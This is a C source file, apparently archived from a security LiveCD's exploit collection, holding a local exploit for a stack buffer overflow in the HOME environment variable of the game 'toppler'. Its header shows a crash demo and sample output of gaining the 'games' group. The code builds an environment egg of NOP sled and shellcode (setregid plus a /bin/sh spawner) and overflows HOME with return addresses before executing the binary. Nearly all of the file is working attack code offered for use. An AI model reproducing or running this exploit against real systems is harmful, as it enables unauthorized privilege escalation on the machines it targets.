home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / toppler / FBHtoppler.c < prev   
C/C++ Source or Header  |  2005-02-12  |  3KB  |  142 lines

  1. /*
  2.         LOCAL TOPPLER EXPLOIT
  3.  
  4.     A Buffer overflow in HOME enviroment variable.
  5.     Just your standard stack overflow...
  6.  
  7.     [bobby@blah Code]$export HOME=`perl -e 'print"A"x144'`
  8.     
  9.     [bobby@blah Code]$ /usr/bin/toppler
  10.     Nebulous version 0.96
  11.     Segmentation fault
  12.  
  13.  
  14.     Should give a GID=20 on successful exploitation.
  15.  
  16.  
  17.     [bobby@blah Code]$ id
  18.     uid=501(bobby) gid=501(bobby) groups=501(bobby)
  19.  
  20.     
  21.     [bobby@blah Code]$ ./FBHtoppler
  22.     Using address: 0xbffff81c
  23.     sh-2.05b$id
  24.     uid=501(bobby) gid=20(games) groups=501(bobby)
  25.  
  26.  
  27.     Kinda weird but could be useful in some situations...:P
  28.  
  29.  
  30.        SYSTEM TESTED ON: 
  31.         Mandrake Linux release 9.0 (dolphin) for i586
  32.  
  33.  
  34.  
  35.  
  36.  
  37. Greetz: USG , DarkCode , DkD , Johan , s4t4nic_s0uls , Dj king  , hein
  38. , hyperd0t , 
  39.     RunningMan(thanx for the java), kafka ,Cc0d3r ,wazzabi(thx for the rza
  40. album)
  41.     
  42.     also , greetz to the dtor team.
  43.     
  44.     Not forgetting all of the FBH crew too.. heh .pk rules!!!
  45.     
  46.     
  47.     FBHowns@hushmail.com , comments + criticisms welcome :P
  48. */
  49.  
  50.  
  51.  
  52.  
  53. #include <stdlib.h>
  54. #include <stdio.h>
  55.  
  56. #define DEFAULT_OFFSET                  0
  57. #define BUFFER_SIZE                 250         // buffer is 144 , made larger
  58. by 100+ for easy exploiting
  59. #define EGG_SIZE                       2048
  60. #define NOP                            0x90
  61. #define ALIGN                1
  62. #define BINARY                "/usr/bin/toppler"    //path to binary
  63. char shellcode[] =
  64.  
  65.  
  66.  
  67. /*setregid(20,20) shellcode by me  */
  68.  
  69.  
  70. "\x31\xc0"            /* xor %eax, %eax */
  71. "\x31\xdb"            /* xor %ebx, %ebx */
  72. "\x31\xc9"            /* xor %ecx, %ecx */
  73. "\xb3\x14"            /* mov $0x14, %bl */
  74. "\xb1\x14"            /* mov $0x14, %cl */
  75. "\xb0\x47"            /* mov $0x47, %al */
  76. "\xcd\x80"            /* int $0x80      */    
  77.  
  78.  
  79.  
  80.  /*  Shellcode by Aleph One  */
  81.   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  82.   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  83.   "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  84.  
  85.  
  86.  
  87. unsigned long get_esp(void) {
  88.    __asm__("movl %esp,%eax");
  89. }
  90.  
  91. void main(int argc, char *argv[]) {
  92.   
  93.  
  94.   char *buffer, *ptr, *egg;
  95.   
  96.   long *address_p, addr;
  97.   
  98.   int offset= DEFAULT_OFFSET, bsize= BUFFER_SIZE;
  99.   
  100.   int i, egg_size= EGG_SIZE;
  101.  
  102.   if (argc > 1) bsize   = atoi(argv[1]);
  103.   if (argc > 2) offset  = atoi(argv[2]);
  104.   if (argc > 3) egg_size = atoi(argv[3]);
  105.  
  106.  
  107.   if (!(buffer = malloc(bsize))) {
  108.     printf("Can't allocate memory.\n");
  109.     exit(0);
  110.   }
  111.   
  112.   if (!(egg = malloc(egg_size))) {
  113.     printf("Can't allocate memory.\n");
  114.     exit(0);
  115.   }
  116.  
  117.   addr = get_esp() - offset;
  118.   printf("Using address: 0x%x\n", addr);
  119.  
  120.   ptr = buffer;
  121.   address_p = (long *) (ptr+ALIGN);    
  122.   for (i = 0; i < bsize; i+=4)
  123.     *(address_p++) = addr;
  124.  
  125.   ptr = egg;
  126.   for (i = 0; i < egg_size - strlen(shellcode) - 1; i++)
  127.     *(ptr++) = NOP;
  128.  
  129.   for (i = 0; i < strlen(shellcode); i++)
  130.     *(ptr++) = shellcode[i];
  131.  
  132.   buffer[bsize - 1] = '\0';         // '\0' or else there wil be trouble
  133.   egg[egg_size - 1] = '\0';
  134.  
  135.   memcpy(egg,"EGG=",4);
  136.   putenv(egg);                   // put our made egg in the env
  137.   memcpy(buffer,"HOME=",5);
  138.   putenv(buffer);               // put our prepared buffer in env
  139.   execlp(BINARY,BINARY,0);          // execute it
  140. }
  141.  
  142.